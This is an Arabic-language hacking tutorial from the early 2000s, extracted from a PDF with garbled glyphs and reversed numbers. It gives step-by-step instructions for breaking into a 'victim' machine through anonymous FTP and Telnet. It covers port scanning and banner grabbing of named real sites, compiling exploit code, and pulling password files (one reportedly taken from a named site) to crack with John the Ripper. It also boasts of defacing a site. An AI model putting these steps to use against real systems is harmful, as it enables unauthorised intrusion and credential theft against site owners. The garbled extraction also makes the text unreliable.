اھمھا‪ ‬‬ ‫‪ Superscanne‬‬ ‫بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانیة و ھي‪ ‬‬ ‫إضغط على‪ ‬‬


‫‪ Start‬‬ ‫ثم‪ ‬‬ ‫‪ Run‬‬ ‫ثم اكتب‪ ‬‬ ‫‪ ftp ­n‬‬ ‫سوف تطلع لك نافدة في الدوس مكتوب علیھا‪ ‬‬ ‫‪ >FTP‬‬ ‫ؤوكي لحد ھنا كل شيء تمام‪ ‬‬ ‫و بعدين اكتب‪ ‬‬ ‫‪ Open‬‬ ‫ثم إضغط على‪ ‬‬ ‫إدخال‪ ‬‬ ‫‪ Enter‬‬ ‫سوف تتحصل عب النتیجة التالیة‪ ‬‬ ‫‪ >FTP‬‬ ‫‪ To‬‬ ‫‪ 952‬‬ ‫أكتب بجانب‪ ‬‬ ‫‪ To‬‬ ‫رقم البي للضحیة ثم إضغط على إدخال‪ ‬‬ ‫و الن خد بالك معي‪ ‬‬ ‫إدا تحصلت على ھدا الرد فقد تخطیت خطوة‪ ‬‬ ‫‪ Connected to www.assassin.com‬‬ ‫‪ .)0.4 220 websrv1 Microsoft FTP Service (Version‬‬ ‫و الن أكتب الكتابة التالیة‪ ‬‬ ‫‪ ftp>quote user ftp‬‬ ‫إدا تحصلت على ھدا الرد فقد تخطیت خطوة‪ ‬‬ ‫‪ 331 Anonymous acces allowed, send identify (e­mail name) as‬‬ ‫‪ .password‬‬ ‫و الن أكتب الكتابة التالیة‪ ‬‬ ‫‪ ftp>quote cwd ~root‬‬ ‫إدا تحصلت على ھدا الرد فقد تخطیت خطوة‪ ‬‬ ‫‪ 530 Please login with USER and PASS‬‬ ‫ثم أكتب الكتابة التالیة‪ ‬‬ ‫‪ ftp>quote pass ftp‬‬ ‫إدا تحصلت على ھدا الرد فقد تخطیت خطوة‪ ‬‬ ‫و نجحت في القتحام‪ ‬‬ ‫‪ .230 Anonymous user logged in‬‬ ‫مبروك أنت الن في جھاز الضحیة‪ ‬‬ ‫ما علیك الن ال ان تقوم بإستعمال‪ ‬‬ ‫اوامر الفتیبي‪ ‬‬ ‫و طبعا لن امر علیھ ا مرور الكرام لكي ل تقعو في المشكلة الي وقعت فیھا و‪ ‬‬ ‫ھي نجاح القتحام من دون ما أعرف و ل فكرة على اوامر الفتیبي و إدا اردتم ان‬ ‫تضحكو بقالیأكثر من ‪ 02‬دقیقة و انا مجمد اليدي و الضحیة عالقة من دون أن‪ ‬‬ ‫أعمل أي شيء و لھدا‪ ‬‬ ‫قمت بحتضیر الوامر لكي تطبقوھ ا مباشرةا بعد نجاح القتحام‪ ‬‬ ‫‪ Pwd‬‬ ‫لكي تعر ما يحتويه الھارد ديسك‪ ‬‬ ‫‪ Cd‬‬ ‫‪ 062‬‬


‫لقتحام مجلد مثال‬ Cd black ‫في ھ دا المثال قمت بإقتحام مجلد المسمى بلك‬ Ls ‫لكي يتضح لك محتوى المجلد أو الھارد ديسك‬ Get ‫لكي تحمل الى سطح المكتب بتاع جھازك‬ ‫مثال‬ Get black.exe Put ‫العملیة العكسیة ل‬ Get ‫يعني ان تأخد ملف من سطح المكتب بتاع جھازك و تضعه في‬ ‫في جھاز الضحیة‬ ‫مثال‬ Put black.exe Close ‫لقطع التصال مع الضحیة‬ ‫ھدي أھ م الوامر و الن سون تطرق على أنواع الرسائل الي نتحصل علیھا من‬ ‫جھ از الضحیة أثناء تطبیق الوام و شرحھا و ارقامھا‬ Codes: Signification: 110 Restart marker reply. 120 Service ready in nnn minutes. (nnn est un temps) 125 Data connection already open; transfer starting. 150 File status okay; about to open data connection. 200 Command okay. 202 Command not implemented, superfluous at this site. 211 System status, or system help reply. 212 Directory status. 213 File status. 214 Help message. 215 NAME system type. 220 Service ready for new user. 221 Service closing control connection. 261 225 Data connection open; no transfer in progress. 226 Closing data connection. 227 Entering passive mode (h1, h2, h3, h4, p1, p2). 230 User logged in, proceed. 250 Requested file action okay, completed. 257 "PATHNAME" created. 331 User name okay, need password. 332 Need account for login. 350 Requested file action pendingfurther information. 421 Service not available, closing control connection. 425 Can't open data connection. 426 Connection closed; transfer aborded. 450 Requested file action not taken. (Fichier déjà utilisé par autre chose) 451 Requested action aborded: local error processing.


‫‪452 Requested action not taken. (Pas assez de mémoire pour exécuter‬‬ ‫)‪ l'action‬‬ ‫‪ 500 Syntax error, command unrecognized.‬‬ ‫‪ 501 Syntax error in parameters or arguments.‬‬ ‫‪ 502 Command not implemented.‬‬ ‫‪ 503 Bad sequence of commands.‬‬ ‫‪ 504 Command not implemented for that parameter.‬‬ ‫‪ 530 Not logged in.‬‬ ‫‪ 532 Need account for storing files.‬‬ ‫‪ 550 Requested action not taken. (Fichier non trouvé, pas d'accès‬‬ ‫)‪ possible,...‬‬ ‫‪ 551 Requested action aborded: page type unknown.‬‬ ‫‪ 552 Requested file action aborded.‬‬ ‫)‪ 553 Requested action not taken. (Nom de fichier non attribué‬‬ ‫و الن أرجو ان اكون قد نجحت في شرح ھده الطريقة على فكرة ھده الطريقة‪ ‬‬ ‫يمكن ان تستعمل لقتحام موقع كما تستعمل لقتحام جھاز‪ ‬‬ ‫‪ 262‬‬ ‫الختراق عن طريق التلنت‪ ‬‬ ‫للكاتب ‪ Mega_Egypt:‬‬ ‫ماھو التلنت؟‪ ‬‬ ‫كیفیة تشغیل التلنت؟‪ ‬‬ ‫ما ھ ي بعض الوامر المستخدمة في التلنت؟‪ ‬‬ ‫خاتمة‪ ..........‬‬ ‫ماھو التلنت‪ :‬‬ ‫ھو عبارة عن أداة يتم تحمیلھا مع الويندوز وبواسطة ھذه الداه يتم التصال‪ ‬‬ ‫بین جھ ازين عن طريق بورت معین‪ ‬‬ ‫كیفیة تشغیل التلنت‪ :‬‬ ‫روح لـ ‪ Start­­­­­­­­­à Run­­­­­­­­­àTelnet‬‬ ‫ھیفتحلك واجھه البرنامج ھتروح لـ ‪ Connect ­­­­­­­­àRemote System‬‬ ‫ھتكتب في خانة ‪ FTP.victim.com Host Name‬طبعا بدل ‪ victim‬اكتي اسم‬ ‫الموقع من غیر ‪ WWW‬‬ ‫جینا للنقطة المھمة وھي خانة ‪ Port‬انت طبعا قبل كل حاجة المفروض انك‪ ‬‬ ‫عامل ‪ Scanner‬على موقع الضحیة وعارف ايه المنافذ المفتوحة وھديك‪ ‬‬ ‫دلوقتي ارقام النافذ‪ :‬‬ ‫‪ 21ß­­­­­­­­­­­ FTP‬‬ ‫‪ 23< ­­­­­­­­­Telnet‬‬ ‫‪ 25 <­­­­­­­­­­­smtp‬‬ ‫‪ 43 ­­­­­­­­­­<whois‬‬ ‫‪ 80<­­­­­­­­­­­­ http‬‬ ‫‪ 3110 <­­­­­­­­­­pop‬‬ ‫‪ 143<­­­­­­­­­­­ Imap‬‬ ‫المھم تكتب في خانة ‪ 21Port‬وده بورت ‪FTP‬ھیطلعلك رسالة تفیدك بان‪ ‬‬ ‫السیرفر جاھز‪ ‬‬ ‫طیب دلوقتي عايزين ندخل للسیرفر ھنجیب يوزر وباسوورد منین‪ ‬‬ ‫متقلقش ھندخل في وضع التخفي شوف الطريقة دي ھتكتب الكلم اللى‪ ‬‬ ‫ھقلھولك بس نش ھتشوف اللى بتكتب‪ ‬‬ ‫‪ 362‬‬ ‫اكتب‪ ‬‬ ‫‪ User anonymous‬وبعدين اضغط انتر ھیطلعلك الرسالة دي‪ ‬‬ ‫‪ 331 Guest login Ok, Send your complete e­mail address as password‬‬


‫بھد كده ھتكتب ‪ Pass @yahoo‬‬ ‫طبعا ممكن تدي ايمیلك وممكن تدي اي حاجة فیھا رمز @‪ ‬‬ ‫بعد كده ھیديك‪ ‬‬ ‫‪) 230 Logged in Anonymously‬بتتغیر على حسب نوع السیرفیر)‪ ‬‬ ‫خلص ابسط على الخر احنا دلوقتي في السیرفیر لكن احنا عايزين نعمل‪ ‬‬ ‫وصله عن طريق المر ‪ PASV‬‬ ‫ھیطعلك ‪ IP‬الموقع وبعد الـ ‪ Ip‬ھ تلقي آخر خانتین ودي خانة البورت وھنعمل‬ ‫دلوقتي عملیه حسابیه علشان نطلع البورت اللى ھندخل منه وھي نجیب‪ ‬‬ ‫الخانة لولي من خانة البورت نضربھا في ‪ 652‬والناتج يتجمع علیه الخانة التانیة ‪.‬‬ ‫مثال (‪ )21,02,52,425,45,402‬ھنعمل العملیه دي ‪ 65220x+21= 2315‬‬ ‫ھتفتح خانة ‪Telnet‬جديده بعد كده تكتب في خانة ‪ Host Name‬‬ ‫‪ FTP.Victim.com‬وبدل ‪ Victim‬اكتب اسم الموقع واكتب في خانة ‪Port 2315‬‬ ‫طبعا في الخانة الولى تدخل المر وفي الخانة التانیه‪ ‬‬ ‫ھیطله الناتج وھ یتم قطه التصال في النافذه التانیه بعد اي امر تروح للخانة‪ ‬‬ ‫الولى ودخل امر ‪ PASV‬تعمل العملیه الحسابیه وتفتح ‪Telnet‬جديد وتدخل‪ ‬‬ ‫اسم والبورت الجديد وطبعا بعد كدة معدش فیه حاجة غیر الامر‪ ‬‬ ‫بعض الوامر المستخدمة في التلنت‪ :‬‬ ‫‪Lest‬لستعراض كل ما على السیرفر‪ ‬‬ ‫‪ Get‬لسحب اي ملف من على السیرفیر‪ ‬‬ ‫‪ Dir‬لعرض المفات التي على السیر فر‪ ‬‬ ‫‪ Cd‬للنتقال بین الملفات‪ ‬‬ ‫‪ Cd..‬للرجوع الى الدلیل الذي يعلو الملف المتواجد فیه حالیا‪ ‬‬ ‫‪ Send‬لرسال اي ملف للسیرفیر وھ ناك اوامر كتییره حاول تجربھا‪ ‬‬ ‫‪ Put‬لوضع ملف معین على السیرفر‪ ‬‬ ‫‪ Pwd‬لمعرفة الدلیل المتواجد فیه انا على السیرفر‪ ‬‬ ‫‪ Rename‬لتغیر اسماء ملفات على السیرفر‪ ‬‬ ‫‪ Rmdir‬لجذف ملف معین من السیر فر‪ ‬‬ ‫‪ Mkdir‬لعمل ملف جديد على السیرفر‪ ‬‬ ‫‪ 462‬‬ ‫الخاتمة‪ :‬‬ ‫أشكركم جمیعا واشكر ‪ The oNe‬فكتابه كان عون لیه‬ ‫وتقبلوا تحیات ‪ mr_Shark96‬‬ ‫‪ BrUtE HaCk Team‬‬ ‫أي استفسارات ارجو مراسلتي على‪ ‬‬ ‫‪ Mega_Egypt2003@yahoo.com‬‬ ‫‪ 562‬‬ ‫اختراق المواقع‪ ‬‬ ‫كیف أجمع معلومات حول موقع ?‪ ‬‬ ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‪ ‬‬ ‫أول خطوه تصلحھا ھ ي بورت سكان ? أنصحك تستخدم ‪ nmap‬المشھوره‪ ‬‬ ‫والقواء على الطلق‪،‬يمكن أن تبحث عنھا ھذا إذا ما لقیتھا في الموقع‪ ‬‬ ‫‪ http://www.inscure.org/nmap‬وھ ي تعمل على نظام لیونكس ? إذا أردت‪ ‬‬ ‫برنامج يعمل على ويندوز انصحك بـ ? ‪ SuperScan‬علیك البحث عنھا في‪ ‬‬ ‫النترنت ? سوف تجد آلف المواقع التي تقدمھ ا لتنزيل ? ومن الممكن أن‪ ‬‬ ‫تستخدم نصوص ‪ Perl‬لعملیه البحث ? لغه ‪ Perl‬أصبحت اللغه محبوبه لدى‪ ‬‬ ‫جمیع الھاكر بعد ‪ C‬‬ ‫بعد الحصول على النتائج ? مثل نصلح تجربه على الموقع‪ ‬‬ ‫‪ http://www.7lem.com/‬بعض برامج البحث تطلب وضع رقم الي بي للموقع ?‬ ‫ولتقبل الدوماين عندھا إستخدم ‪ ping‬لتعرف رقم الي بي (‪ ‬‬ ‫تأتي النتائج ? البورتات (‪ - 415 - 315 - 341 - 011 - 73 - 52 - 32 - 22 - 12‬‬


‫‪ )785‬ويوجد منافذ أخرى لكن لن نھتم لھا ھنا ? نقوم بعملیه نزع التواقیع‪ ‬‬ ‫للمنافذ ‪ ...‬‬ ‫ماھي عملیه نزع التواقیع للمنافذ؟‪ ‬‬ ‫من المعروف أن المنفذ فتح من قبل تطبیق ? عند التصال بھذا المنفذ فسوف‪ ‬‬ ‫يتم إرجاع رد الیك ? مثل لو إتصلت بالبورت ‪ 32‬وھو لتلنت ? وموقع‪ ‬‬ ‫‪ http://www.7lem.com/‬توجد به خدمه تلنت ? ويتضح ھذا من عملیه مسح‪ ‬‬ ‫المنافذ ?التصال بخدمه اتلنت‪ ‬‬ ‫‪ http://www.7lem.com/telnet‬‬ ‫يتم تنفیذ المر التالي في ‪ Windows‬و ‪ Linux‬و ‪ SunOS‬و ‪ FreeBSD‬و ‪ QNX‬‬ ‫بنفس الصیغه ? ولكن أفضل ‪ Linux‬عنھا ? وھ و لن لینكس يوفر كل ماتحتاجه‪ ‬‬ ‫من أدوات ‪...‬ھ ذا المستند ل يختص بـ ‪ Linux‬لذلك لن أذكرھا ? تأتي نتیجه‪ ‬‬ ‫التصال بسیرفر الحلم على بورت التلنت‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ 7.5 SunOS‬‬ ‫‪ ­­­­­­­­­­­­­­­­­­­­­­ : login‬‬ ‫‪ 662‬‬ ‫يتضح بأن السیرفر يعمل على نظام? ‪ SunOS 7.5‬بقي علیك أن تنتزع التواقیع‪ ‬‬ ‫من البورتات المتبقیه لتعرف ما ھ و التطبیق وإصدارته المنصت لھا (إستخدم‪ ‬‬ ‫التلنت ) ? وثم تقوم ببحث عن نقاط ضعف لھا وتحصل على شیفرات الستثمار‬ ‫الخاصه بھا ? الخطوه التالیه ھي أن تعرف ما ھو ملقم الويب الذي يعمل على‪ ‬‬ ‫ھذا النظام ? نذھب الى الترمینال تبع لیونكس ونكتب‪ ‬‬ ‫‪ 80 http://www.7lem.com/nc‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ .‬‬ ‫‪ .‬‬ ‫‪ .‬‬ ‫‪ Apache/1.3.* Server‬‬ ‫‪ .‬‬ ‫‪ .‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫أختصرت النتیجه وتم تضلیل إصدار ملقم الويب وذلك لحمايه الموقع ? اتمنى أن‬ ‫تستطیع كشفه بنفسك ‪ ...‬‬ ‫من المعروف من عملیه السكان بورت بأن البورتین ‪ 52 ? 011‬مفتوحین ? ھذا‪ ‬‬ ‫يدل على أن في الموقع خدمة البريد اللكتروني ? بالطبع ھذا يفیدك لمعرفه‪ ‬‬ ‫‪smtp ? pop‬للموقع ? كل ماعلیك فعله ھو كتابه المر التالي (في ( ‪ Linux‬‬ ‫‪ host 7lem.com‬‬ ‫وأنتظر النتائج‪ ‬‬ ‫ملحظه ‪ -:‬إذا كنت تعیش مع بن لدن ولست عائش في جو تقنیه معلومات‪ ‬‬ ‫كل ما علیك فعله ھ و تفجیراليمیل (على حسب ما يسمیھا كثیر من الناس (‪ ‬‬ ‫ملحظه ثانیه ‪ -:‬إذا لم تجد في السیرفر خدمه تلنت أو أنه تم تغییر التوقیع عن‬ ‫طريق مثل قرصنه النظام ‪....‬الخ ? علیك أن تستخدم ‪ queso‬الداة المفضله‪ ‬‬ ‫لكشف نظام التشغیل ? وھي تعمل على لیونكس ? لستخدامھا علیك كتابه‪ ‬‬ ‫‪ http://www.7elm.com/queso‬‬ ‫‪ 762‬‬ ‫كل ماعلیك بعد تثبیت الداة في جھازك ھو كتابه ‪ queso‬وثم مسافه والموقع‪ ‬‬ ‫ورقم البورت ‪ 08‬والذي ھو بطبیعه الحال مفتوح في جمیع المواقع‪...‬يأتیك الرد‪ ‬‬ ‫بأن النظام ‪ SunOS 7.5‬‬ ‫لو أردت مثل قائمة بالبريدات الموجوده في موقع ‪ http://www.alzeer.net /‬مثل‬ ‫‪( support‬أو ‪ webmaster‬أو‪ info ...‬الخ ) أو أدرت معرفه الـ ‪ DNS‬الولي‪ ‬‬ ‫والثانوي للموقع ? أو من ھو الشخص اللي سجل ومعلومات عنه وما ھي‪ ‬‬


‫الشركه التي تستظیف الموقع ? علیك بإستخدام خدمه ? ‪ whois‬تستطیع‪ ‬‬ ‫إستخدام خدمه ‪ whois‬وتطلب معلومات من قواعد بیانات ‪ whois‬عن طريق أمر‬ ‫‪whois‬في لینكس ? أكتب ‪ man whois‬لمزيد من المعلومات ? إذا كنت‪ ‬‬ ‫تستخدم ويندوز أو أي بیئه أخرى أنصحك بالتوجه الى برمجیات السي جي آي‬ ‫المتواجد في الموقع‪ ‬‬ ‫‪ http://www.psyon.org/tools/index.html‬‬ ‫توفر لك ھ ذه الصفحه مجموعه من برمجیات السي جي آي التي تسھل لك‪ ‬‬ ‫المھمه ? ھناك رياضیات لطلب معلومات عن موقع ويب بإستخدام ‪ whois‬وھي‬ ‫مفیده جدا ? على كل حال توجه الى الموقع التالي لمزيد من التفاصیل‪ ‬‬ ‫‪ http://www.google.com/search?q=whois&btnG=Google+Search‬‬ ‫كیف يتم كشف نقاط الضعف ?‪ ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~‪ ‬‬ ‫ل تستخدم برامج مثل ‪ void eye‬أو ‪ ShadowSecurityScaner‬ھذه للمغفلین‪ ‬‬ ‫فقط!!? المحترفین واللي يبغا يكون محترف ل يستخدم برامج في عملیات‪ ‬‬ ‫الختراق ? ول يخترق لمجرد أنه يبغا يخترق ? عملیه إختراق سیرفر تمتاز‪ ‬‬ ‫بالدقه المتناھ یه ? والتخطیط المحكم ? وكل عملیات السطو المحكمه ھي‪ ‬‬ ‫التي يصعب إكتشاف مرتكبیھ ا ? لكن واالله لو كنت من اللي يشغل برنامج‪ ‬‬ ‫ومايدري االله وين حاطه فصدقني إنك ماراح تفلح طول عمرك ? ھذا لو قدرت‪ ‬‬ ‫تخترق شئ ? فلو حدث وتم الختراق بواحد من ھ ذه البرامج فسوف تصطاد‪ ‬‬ ‫بسناره تماما كالسمكه‪ ‬‬ ‫نقاط الضعف المفضله والتي تعتبر كأسرار ول يكشف عنھا ال بعد فتره طويله‪ ‬‬ ‫ھي التي في ملقم الويب مثل ‪ Apache‬أو ? ‪ IIS‬وكذلك نقاط الضعف الموجوده‬ ‫في سكربتات ‪ CGI‬و ‪ Perl‬و ? ‪ PHP‬أو التي قد تكون موجوده في البرنامج‪ ‬‬ ‫المستخدم لتفسیر نصوص البیرل أو السي جي آي ? وإذا كان في الموقع‪ ‬‬ ‫برنامج لتسوق مثل من الممكن أن تستغل فیه نقطه ضعف ھذا إذا وجدت به ?‬ ‫يعني اي شئ في السیرفر سوى كان سكربت بیرل أو سي جي آي‪..‬أو كان‪ ‬‬ ‫‪ 862‬‬ ‫برنامج تنفیدي أو حتى نظام التشغیل أو ملقم الويب مصاب بنقطه ضعف من‪ ‬‬ ‫الممكن أن يعرض السیرفر للختراق ويعرض كل ما بداخله من أسرار الى‪ ‬‬ ‫المخترق‪ ‬‬ ‫}‪ .cgi } http://www.fbunet.de/cgibin/nph -‬ھذا ? ‪ CGI‬ل تستغرب ? ھذه‪ ‬‬ ‫ھي الحركات الجديده لنشر ال‪ ‬‬ ‫نكمل الموضوع ‪ ....‬‬ ‫لنأخذ مثال ‪ :‬الموقع ‪ timduff.com‬ھذا موقع يستحق التدمیر ? وقد تم ذلك ?‪ ‬‬ ‫وھ و الن تم إرجاعه ولكن من جديد ول يحوي ال القلیل من الصفحات ل تتجاوز‪ ‬‬ ‫إثنتان‪ ‬‬ ‫الن سوف أضع النقاط الساسیه لكشف نقاط ضعف على موقع ما ‪ :-‬‬ ‫‪1‬التعرف على كافه الخدمات الموجوده على السیرفر‪ ‬‬‫‪2‬معرفه نظام التشغیل وإصدارته وكذلك ملقم الويب وأي برمجیات أخرى مثل‪ ‬‬‫مفسر نصوص بیرل إذا كان ذلك ممكن ? أو برنامج للبیع والشراء‪ .....‬الخ‪ ‬‬ ‫‪3‬عمل جلسه للتقاط كل السكربتات ( ‪ ( Perl ­ Cgi‬الموجوده في الموقع ?‪ ‬‬‫ھذا إذا وجد شئ منھا‪ ‬‬ ‫‪4‬ولتنسى تحط البورتات معھا ? لنه أحیانا يكون في البورت نقطه ضعف ?‪ ‬‬‫لیس ھذا صحیحا ‪ %001‬نقطه الضعف لیست في البورت بعینه ? في البرنامج‪ ‬‬ ‫اللي مصلح إنصات للبورت (ھذا أقرب تعبیر لھا (‪ ‬‬ ‫‪5‬أخیرا يمكنك الستفاده من المعلومات التي حصلت علیھا في البحث عن‪ ‬‬‫نقاط ضعف‪ ‬‬ ‫كیف يمكن إستغلل نقاط الضعف المكتشفه ?‪ ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‪ ‬‬ ‫أبسط الثغرات والتي يستطیع أي مبتدي أن يستخدمھا ھي تلك التي تنفذ من‬


‫خلل المتصفح? مثل المثال السابق ذكره لختراق الموقع‪ ‬‬ ‫‪ /http://www.timduff.com‬‬ ‫‪ 962‬‬ ‫نوع آخر ? يكون الستثمار (من الن سوف نطلق إسم إستثمار على الطريقه‪ ‬‬ ‫التي تستغل بھا الثغره) يكون الستثمار على شكل شفره (كود) مكتوب‪ ‬‬ ‫ببرنامج ‪ sh‬في لیونكس ? وھ و ما يسمى بالعربي برنامج الغلف وبالنجلیزي‪ ‬‬ ‫‪shell‬وتكون ھذه الشفره تحت ملف بالمتداد ‪ *.sh‬وتعمل تحت بیئه لیونكس ?‬ ‫وھذا النوع من الستثمارات ھ و المفضل ويحسس المخترق بالقوه ونظرا لتعدد‪ ‬‬ ‫الداوت في لیونكس فإن لغه ‪ shell‬اصبحت قويه فھي تقابل كتابه ملف دفعاتي‬ ‫في ويندوز (‪ (bat‬‬ ‫ويوجد نوع من الستثمارات ثاني وھو شفره (كود) مكتوب بلغه ‪ C‬المشھوره ?‪ ‬‬ ‫وھ ذا النوع غالبا ما تحدث فیه أخطأ أثناء عملیه الترجمه ? قد تواجه كثیر من‪ ‬‬ ‫المتاعب لذلك يجب أن تكون لديك خلفیه في لغه سي ? ولترجمه ھذا النوع‪ ‬‬ ‫علیك بالذھ اب الى لیونكس وترجمته بإستخدام المترجم ‪ gcc‬‬ ‫‪ gcc Exploit.c ­o Exploit‬‬ ‫ملحظه مھ مه ( يجب أن يكون المتداد للمف ‪ *.c‬ولیس ? ‪ *.C‬لو كان حرف ‪ c‬‬ ‫كبتل فسوف يترجم الستثمار وكأنه كتب في سي ? ‪ ++‬الشئ الثاني تأكد‪ ‬‬ ‫من توفر المكتبات (‪ (*.h‬التي يتطلبھا الستثمار قبل تشغیله)‪ ‬‬ ‫يوجد نوع ظھ ر مؤخرا من الستثمارات وبداء ينتشر وھو أيضا شفره ولكن‪ ‬‬ ‫مكتوبه بلغه ‪ Perl‬ومن الممكن أن يتم تشغیل ھذا النوع من موجه الدوس في‪ ‬‬ ‫ويندوز (يجب أن تملك برنامج يفسر شفرات البیرل مثل أكتیف بیرل)‪ ‬‬ ‫وأحیرا انواع نادره من الستثمارات قد تكون على شكل خطوات ‪ ....‬‬ ‫= ‪Exploit‬إستثمار‪ ‬‬ ‫ماھو ملف كلمة المرور ‪ password file‬؟‪ ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‪ ‬‬ ‫ملف كلمة المرور معروف من إسمه ? ھو الذي في داخله توجد حسابات‪ ‬‬ ‫الشخاص المرخص لھم بالدخول الى السیرفر ? مثل ھذا‪ ‬‬ ‫‪ 072‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪ ‬‬ ‫‪ root:x:0:1:Super­User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪ sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪ Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫‪ Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico‬‬ ‫‪ listen:x:37:4:Network Admin:/usr/net/nls:‬‬ ‫‪ nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access‬‬ ‫‪ User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:‬‬ ‫‪ www:x:102:1001::/web:/bin/csh‬‬ ‫‪ mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu‬‬ ‫‪ sid:x:103:10::/export/home/sid:/bin/ksh‬‬ ‫‪ mirror:x:104:1::/home/mirror:/bin/sh‬‬ ‫‪ admin:x:105:1::/home/admin:/bin/sh‬‬ ‫‪ jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh‬‬ ‫‪ landmark:x:1000:1000::/web/landmark:/bin/ksh‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­‪­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫­­­­­­­­­­‪ ‬‬ ‫وقد تكون أكثر بكثیر ? حیث أن ھ ذا الملف الموضح بالعلى أختصر بشكل كبیر‪ ‬‬ ‫? فعند سحبه كان يحتوي على آللف السطور ? لیس كل ملفات كلمات المرور‬ ‫بھ ذا الحجم فیوجد منھا من ل يتجاوز ‪ 01‬أسطر وھي الموجوده بكثره ? على‪ ‬‬


‫العموم أنت الحین علیك تعرف بأن ملف كلمة المرور ھو الذي في داخله توجد‪ ‬‬ ‫حسابات الشخاص المرخص لھم بالدخول الى السیرفر‪ ...... ‬‬ ‫بماذا يفیدني ھذا الملف‪ ? ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~‪ ‬‬ ‫يفیدك في معرفه كلمات السر وإسماء المستخدمین لكي تقوم بإختراق الموقع‬ ‫? ولكن لتفرح ‪ !...‬كلمة المرور تكون مشفره ? ل ھذا لیس صحیحا تماما‪ ? ‬‬ ‫كانت مشفره زمان ولكن في الوقت الحالي ھي مضلله‪ ‬‬ ‫*او‪ x = ‬كلمة سر مضلله‪ Shadowed ‬‬ ‫‪ 271‬‬ ‫= ‪EpGw4GekZ1B9U‬كلمة سر مشفره على مقیاس ? ‪ DES‬ھذا النوع من‪ ‬‬ ‫التشفیر المستخدم في لیونكس ‪ ? FreeBSD‬وعدد من النظمه الخرى ضعیف‬ ‫? وھو دائما مكون من ‪ 31‬حرف ورقم كبتل وسمول ول يحتوي من بینھا على‪ ‬‬ ‫رمز ابد ً ? بإستثناء ويندوز فھ و يستخدم نوع آخر من التشفیر وھو نوع ضعیف‪ ‬‬ ‫ا‪ ‬‬ ‫أيضا‪ ‬‬ ‫كیف يمكن معرفة كلمة السر من خلل ملف الباسورد ‪ password file‬؟‪ ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫إضغط ‪ Ctrl + Shift‬في القسم اليمن من لوحه المفاتیح لتقراء من الیسار الى‬ ‫الیمین ? ثم إذھ ب الى العلى حیث وضعت مثال لملف كلمة مرور تم سحبه‪ ‬‬ ‫من الموقع ‪ hwwilson.com ...‬‬ ‫تفسیر ھذا السطر ‪ :-‬‬ ‫‪ root:x:0:1:Super­User:/:/sbin/sh‬‬ ‫‪ root‬‬ ‫ھ ذا السطر يوضخ المستخدم واللي ھو الجذر ‪ root‬‬ ‫‪ x‬‬ ‫وكلمة المرور ? ويتضح انھا مضلله ? يعني مكانھا العلمة ? ‪ x‬ل تفكر في‪ ‬‬ ‫كسرھا فھ ذا مستحیل ? لكن علیك البحث عن ملف ثاني تم تخزين فیه كلمة‪ ‬‬ ‫المرور ? ستعرف بعد قلیل كیف تفعل ھذا‪ ‬‬ ‫‪ 0‬‬ ‫ھذا ھو رقم المستخدم‪ ‬‬ ‫‪ 1‬‬ ‫رقم المجموعه‪ ‬‬ ‫‪ 272‬‬ ‫‪ Super­User:/:/sbin/sh‬‬ ‫ھذا مش مھم‪ ‬‬ ‫ماالفرق بین إذا كان الملف (مشفر (‪ encryption‬وإذا كان (مضلل (‪shadowed‬‬‫?‪ ‬‬ ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫الملف المضلل ‪ shadow file‬يكون مكان كلمة المرور رمز مثل * أو ‪ x‬أو ‪ #‬أو !‪ ‬‬ ‫وھذا مثال لھا‪ ‬‬ ‫‪ root:x:0:1:Super­User:/:/sbin/sh‬‬ ‫لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل ھذه‪ ‬‬ ‫‪ root:Q71KBZlvYSnVw:0:1:Super­User:/:/sbin/sh‬‬ ‫ھنا تكون كلمة المرور المشفره ھي ‪ Q71KBZlvYSnVw‬‬ ‫الن طلعت الصوره صافیه ‪ ....‬‬ ‫===========‪ ‬‬ ‫وماذا لو كان ملف كلمة المرور مشفر ? كیف يتم كسره ?‪ ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫البرامج كثیره وأشھرھا ھو ‪ Crack 5.0a‬و ‪ john the ripper‬ويوجد آخر بإسم‪ ‬‬ ‫? ‪ jack the ripper‬إذا كنت ممن يجیدون العمل في لیونكس فھذا جید ? علیك‪ ‬‬


